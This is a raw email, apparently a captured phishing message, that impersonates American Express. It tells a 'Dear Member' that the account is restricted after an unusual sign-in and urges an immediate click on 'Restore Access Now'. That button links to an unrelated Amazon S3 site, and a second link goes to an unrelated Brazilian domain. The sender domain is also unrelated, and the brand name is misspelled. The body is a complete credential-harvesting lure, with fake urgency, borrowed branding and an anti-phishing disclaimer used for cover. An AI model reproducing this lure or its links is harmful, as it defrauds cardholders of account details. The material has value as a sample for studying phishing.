From: American Epress <webmaster@artmarketeer.com>
To: jose@monkey.org
Subject: Attention.
Date: 10 Dec 2019 07:45:30 -0800
Message-ID: <20191210074530.315DFF68F899158D@artmarketeer.com>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_89EFF6E9.5672A4DB"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.artmarketeer.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - artmarketeer.com
X-Get-Message-Sender-Via: server.artmarketeer.com: authenticated_id: webmaster@artmarketeer.com
X-Authenticated-Sender: server.artmarketeer.com: webmaster@artmarketeer.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 231


------=_NextPart_000_0012_89EFF6E9.5672A4DB
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19541"></HEAD>
<body>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(237,235,233)" width=3D"100%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 rgb(237,235,233); MARGIN-TOP: 0px" align=3Dcenter>Card is being processed<=
/P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,23,90); MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td width=3D"4.84%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td width=3D"44.82%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px"><img style=3D"BORDER-TOP-STYLE: none; BORDER-BOTTO=
M-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: =
block" src=3D"cid:amexdisclaimerlogo.png" width=3D"95" height=3D"60"></P></=
TD>
<td width=3D"45.16%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px" align=3Dright><img style=3D"BORDER-TOP-STYLE: none=
; MAX-WIDTH: 245px; WIDTH: 243px; BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-S=
TYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block" src=3D"cid:americanexp=
resswhitelogo.png" width=3D"245" height=3D"67"></P></TD>
<td width=3D"5.18%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td width=3D"5.81%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td width=3D"48.84%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,23,90); MARGIN-TOP: 0px" align=3Dleft></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,23,90); MARGIN-TOP: 0px" align=3Dleft>ACCOUNT ENDING:<B> XXXX</B> </=
P></TD>
<td width=3D"39.73%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,23,90); MARGIN-TOP: 0px">&nbsp;</P></TD>
<td width=3D"5.62%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"100%">
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"6.01%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"93.99%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 21px; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px" align=3Dleft>Dear Member,</P></TD></TR>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"6.01%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"93.99%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 5pt; FONT-FAMILY: Arial; COLOR: =
black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 21px; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px"><B>Account Security Update</B> </P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE></TD></TR></TB=
ODY></TABLE></TD><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#E=
CECEC"></TD></TR><TR><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=
=3D"#ECECEC"></TD><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#=
FFFFFF"></TD><td colspan=3D"1" rowspan=3D"1" width=3D"492" bgcolor=3D"#FFFF=
FF"></TD><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#FFFFFF"><=
/TD>
<td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#ECECEC"></TD></TR>=
<TR><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#ECECEC"></TD><=
td colspan=3D"3" rowspan=3D"1" width=3D"522" bgcolor=3D"#FFFFFF">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td width=3D"5.62%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td width=3D"4.25%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BORDER-RIGHT: white 1pt solid; BACKGROUND-COLOR: white" width=
=3D"6.4%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BORDER-RIGHT: white 1pt solid; BACKGROUND-COLOR: white" width=
=3D"87.79%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 13pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,111,207); MARGIN-TOP: 0px" align=3Dcenter><B>We've noticed a sign in=
 attempt from an usual location and device. To protect your privacy, Your a=
ccount has been restricted and immediate verification is required.</B> </P>=

<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 13pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,0,118); FONT-STYLE: normal; MARGIN-TOP: 0px" align=3Dcenter>Kindly c=
lick on the link below to access and restore your account.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 13pt; FONT-FAMILY: Arial; COLOR:=
 rgb(0,0,118); FONT-STYLE: normal; MARGIN-TOP: 0px" align=3Dcenter></P>
<table style=3D"MARGIN-LEFT: auto; MARGIN-RIGHT: auto" cellspacing=3D"0" ce=
llpadding=3D"0" border=3D"0">
<TBODY>
<TR>
<td style=3D"BORDER-TOP: rgb(0,23,90) 2px solid; BORDER-RIGHT: rgb(0,23,90)=
 2px solid; BORDER-BOTTOM: rgb(0,23,90) 2px solid; BORDER-LEFT: rgb(0,23,90=
) 2px solid" bgcolor=3D"#00175a" width=3D"270" align=3D"center">
<A title=3Damericanexpress.com/pbc style=3D"FONT-SIZE: 12pt; TEXT-DECORATIO=
N: none; BORDER-TOP: rgb(0,23,90) 1px solid; FONT-FAMILY: Arial; BORDER-RIG=
HT: rgb(0,23,90) 1px solid; WIDTH: 270px; BACKGROUND-IMAGE: none; BACKGROUN=
D-REPEAT: repeat; BACKGROUND-ATTACHMENT: scroll; BORDER-BOTTOM: rgb(0,23,90=
) 1px solid; FONT-WEIGHT: bold; COLOR: rgb(255,255,255); PADDING-BOTTOM: 10=
px; TEXT-ALIGN: center; PADDING-TOP: 10px; PADDING-LEFT: 10px; BORDER-LEFT:=
 rgb(0,23,90) 1px solid; DISPLAY: block; LINE-HEIGHT:=20
17px; PADDING-RIGHT: 10px; BACKGROUND-COLOR: rgb(0,23,90)" href=3D"http://l=
uckkyee34.s3-website-ap-northeast-1.amazonaws.com" rel=3Dnoreferrer target=
=3D_blank>Restore Access Now</A> </TD></TR></TBODY></TABLE></TD>
<td style=3D"BACKGROUND-COLOR: white" width=3D"5.8%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(235,235,235)" width=3D"5.81%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BACKGROUND-COLOR: rgb(235,235,235)" width=3D"5.82%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px" align=3Dcenter></P>
<table style=3D"MARGIN-LEFT: auto; MARGIN-RIGHT: auto" cellspacing=3D"0" ce=
llpadding=3D"0" border=3D"0">
<TBODY>
<TR>
<td style=3D"BORDER-TOP: rgb(0,23,90) 2px solid; BORDER-RIGHT: rgb(0,23,90)=
 2px solid; BORDER-BOTTOM: rgb(0,23,90) 2px solid; BORDER-LEFT: rgb(0,23,90=
) 2px solid" bgcolor=3D"#ffffff" width=3D"270" align=3D"center">
<A style=3D"FONT-SIZE: 12pt; TEXT-DECORATION: none; BORDER-TOP: rgb(255,255=
,255) 2px solid; FONT-FAMILY: Arial; BORDER-RIGHT: rgb(255,255,255) 2px sol=
id; WIDTH: 270px; BACKGROUND-IMAGE: none; BACKGROUND-REPEAT: repeat; BACKGR=
OUND-ATTACHMENT: scroll; BORDER-BOTTOM: rgb(255,255,255) 2px solid; FONT-WE=
IGHT: bold; COLOR: rgb(0,23,90); PADDING-BOTTOM: 10px; TEXT-ALIGN: center; =
PADDING-TOP: 10px; PADDING-LEFT: 10px; BORDER-LEFT: rgb(255,255,255) 2px so=
lid; DISPLAY: block; LINE-HEIGHT: 17px;=20
PADDING-RIGHT: 10px; BACKGROUND-COLOR: rgb(255,255,255)" href=3D"http://crm=
=2Eracsystems.com.br/jssource/tmp/?session=3DQ5LDTgMSQfaIASkrDmIj2r9lWRXijU=
MrwBpEU3djmIj2r9MrwBpEU3djMrwBpEU3djlWRXV3OQfql1MrwBpEU3djWZMrwBpEU3dj" rel=
=3Dnoreferrer target=3D_blank>Questions? Let's chat</A> </TD></TR></TBODY><=
/TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px" align=3Dcenter><img style=3D"BORDER-TOP-STYLE: non=
e; MAX-WIDTH: 270px; WIDTH: 267px; BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-=
STYLE: none; BORDER-LEFT-STYLE: none; DISPLAY: block" src=3D"cid:donotlivel=
ifewithout.png" width=3D"270" height=3D"32"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"100%">
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BACKGROUND-COLOR: rgb(0,23,90)" width=3D"100%" colspan=3D"5">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR>
<TR>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-LEFT: rgb(0,23,90) =
1pt solid; BACKGROUND-COLOR: rgb(0,23,90)" width=3D"5%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-RIGHT: rgb(0,23,90)=
 1pt solid; BACKGROUND-COLOR: rgb(0,23,90)" width=3D"90%" colspan=3D"3">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px" align=3Dcenter><A onclick=3D"return false" style=
=3D"COLOR: rgb(255,255,255)" href=3D"./#NOP" rel=3Dnoreferrer>PRIVACY STATE=
MENT</A> | <A onclick=3D"return false" style=3D"COLOR: rgb(255,255,255)" hr=
ef=3D"./#NOP" rel=3Dnoreferrer>UPDATE YOUR EMAIL</A> </P></TD>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-RIGHT: rgb(0,23,90)=
 1pt solid; BACKGROUND-COLOR: rgb(0,23,90)" width=3D"5%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR>
<TR>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-RIGHT: rgb(0,23,90)=
 1pt solid; BORDER-LEFT: rgb(0,23,90) 1pt solid; BACKGROUND-COLOR: rgb(0,23=
,90)" width=3D"100%" colspan=3D"5">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR>
<TR>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-BOTTOM: rgb(0,23,90=
) 1pt solid; BORDER-LEFT: rgb(0,23,90) 1pt solid; BACKGROUND-COLOR: rgb(0,2=
3,90)" width=3D"5%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-BOTTOM: rgb(0,23,90=
) 1pt solid; BACKGROUND-COLOR: rgb(0,23,90)" width=3D"69.29%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px">Your account information is included above to help=
 you recognize this as a customer care e-mail from American Express. To lea=
rn more about e-mail security or report a suspicious e-mail, please visit u=
s at <A onclick=3D"return false" style=3D"COLOR: rgb(255,255,255)" href=3D"=
=2E/#NOP" rel=3Dnoreferrer>americanexpress.com/phishing</A>
=2E We kindly ask you not to reply to this e-mail but instead contact us vi=
a <A onclick=3D"return false" style=3D"COLOR: rgb(255,255,255)" href=3D"./#=
NOP" rel=3Dnoreferrer>Customer Care</A>.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px" align=3Dleft>&copy; 2019 American Express. All rig=
hts reserved.</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px" align=3Dleft>AGNEUSPK0007001<img style=3D"BORDER-T=
OP-STYLE: none; BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER=
-LEFT-STYLE: none; DISPLAY: block" src=3D"http://www.americanexpress.com/Tr=
acking?mid=3DCUIRS0000000000G776qYv8q4SE&amp;msrc=3DMYCA" width=3D"1" heigh=
t=3D"1"></P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 white; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-BOTTOM: rgb(0,23,90=
) 1pt solid; BACKGROUND-COLOR: rgb(0,23,90)" width=3D"2.13%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-RIGHT: rgb(0,23,90)=
 1pt solid; BORDER-BOTTOM: rgb(0,23,90) 1pt solid; BACKGROUND-COLOR: rgb(0,=
23,90)" width=3D"18.57%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 6pt; FONT-FAMILY: Arial; MARGIN-=
TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P>
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px" align=3Dright><img style=3D"BORDER-TOP-STYLE: none=
; BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: n=
one; DISPLAY: block" src=3D"cid:amexdisclaimerlogo.png" width=3D"95" height=
=3D"95"></P></TD>
<td style=3D"BORDER-TOP: rgb(0,23,90) 1pt solid; BORDER-RIGHT: rgb(0,23,90)=
 1pt solid; BORDER-BOTTOM: rgb(0,23,90) 1pt solid; BACKGROUND-COLOR: rgb(0,=
23,90)" width=3D"5%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE></TD></TR></TB=
ODY></TABLE></TD><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#E=
CECEC"></TD></TR><TR><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=
=3D"#ECECEC"></TD><td colspan=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#=
ECECEC"></TD><td colspan=3D"1" rowspan=3D"1" width=3D"492" bgcolor=3D"#ECEC=
EC">
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%">
<TBODY>
<TR>
<td style=3D"BORDER-LEFT: rgb(230,229,229) 1pt solid; BACKGROUND-COLOR: rgb=
(230,229,229)" width=3D"100%">
<P style=3D"MARGIN-BOTTOM: 0px; FONT-SIZE: 10pt; FONT-FAMILY: Arial; COLOR:=
 black; MARGIN-TOP: 0px">&nbsp;</P></TD></TR></TBODY></TABLE></TD><td colsp=
an=3D"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#ECECEC"></TD><td colspan=3D=
"1" rowspan=3D"1" width=3D"15" bgcolor=3D"#ECECEC"></TD></TR></TBODY></BODY=
></HTML>
------=_NextPart_000_0012_89EFF6E9.5672A4DB
Content-Type: image/png; name="amexdisclaimerlogo.png"
Content-Transfer-Encoding: base64
Content-ID: <amexdisclaimerlogo.png>

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
